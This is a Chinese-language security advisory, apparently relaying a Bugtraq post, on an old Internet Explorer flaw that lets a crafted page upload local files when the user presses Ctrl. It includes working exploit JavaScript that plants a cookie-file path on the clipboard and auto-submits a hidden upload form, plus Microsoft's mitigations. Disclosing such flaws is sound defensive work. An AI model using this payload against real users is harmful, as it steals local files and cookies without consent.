|
用IE浏览不信任网站按CTRL键时文件可被非法窃取
涉及程序:
IE
描述:
用IE浏览不信任网站按CTRL键时文件可被非法窃取
详细:
使用IE浏览不信任网站时,按CTRL键将有可能导致任意本地文件被上传到一个远程服务器上,如果是非常敏感的信息被上传,将有可能被被获得远程控制权限。
攻击者通过精心构建一个javascript 网页 ,当用户浏览时,将能获得任意本地文件。但攻击者要想成功利用此缺陷的话,必须能作到以下几步:
1. 用户在按了 CTRL 键的同时,又按了\'V\'键,也就是说相当于执行了粘贴操作。
2. 剪贴版的内容被改变,并被集中到一个隐藏文件的上载表格中。粘贴的内容被放在表格中,并产生一个文件上载field的变化。
3. 上载的表格被自动递交(合法的 javascript 操作).
攻击者并不需要知道本地文件的确切地址,可以通过使用\"..\\filename\"对文件进行引用。
另外, 如果本地文件 \"..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat\"
被上载,然后任意目录需要得到到达临时 internet 文件夹(这个临时 internet
文件夹是能够被重新获得的)的确切路径。为了知道这个确切的路径,能用 showHelp() 导出并运行 .chm 帮助文件。.chm
帮助文件可引导系统执行任意程序。
攻击方法:
将这段 html 代码放置在一个远程 html 文档中,并用 Internet Explorer 浏览器将它载入,再按 CTRL
键将它击活。必须有一个服务器端脚本以用于其上载过程。如果你计划使用php的话,我们建议你使用http://www.php.net/manual/en/features.file-upload.php作为怎样去安装服务器端脚本的引用。
注意:
1. 将攻击代码中所有的感叹号\"!\"都删除。\"!\"被嵌入是作者为了避免将攻击代码作为邮件上传到 Bugtraq
邮件组时被当作病毒将邮件过滤,删除了。
2. 这里的缺省设置是假定的。
-------------------------- CUT HERE -------------------------------
//uploadFile=\"..\\\\LOCALS~1\\\\TEMPOR~1\\\\CONTENT.IE5\\\\index.dat\";
uploadFile=\"..\\\\Cookies\\\\index.dat\";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData(\"Text\",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
-------------------------- CUT HERE -------------------------------
解决方案:
微软得知这个缺陷后,经过进一步的研究证实了出现的这个问题,但他们说这不符合他们的安全漏洞定义,因此不会为了这个缺陷专门发布一个修复或补丁。但提供了以下临时解决方案:
1. 将“Submit nonencrypted form data”这一选项设置为“disable(禁止)”或“prompt(提示)”;
2. 禁止 \"allow paste operations via script\" (推荐);
3. 禁止 active scripting .
附加信息:
无
相关站点:
http://msgs.securepoint.com/cgi-bin/get/bugtraq0207/179.html
|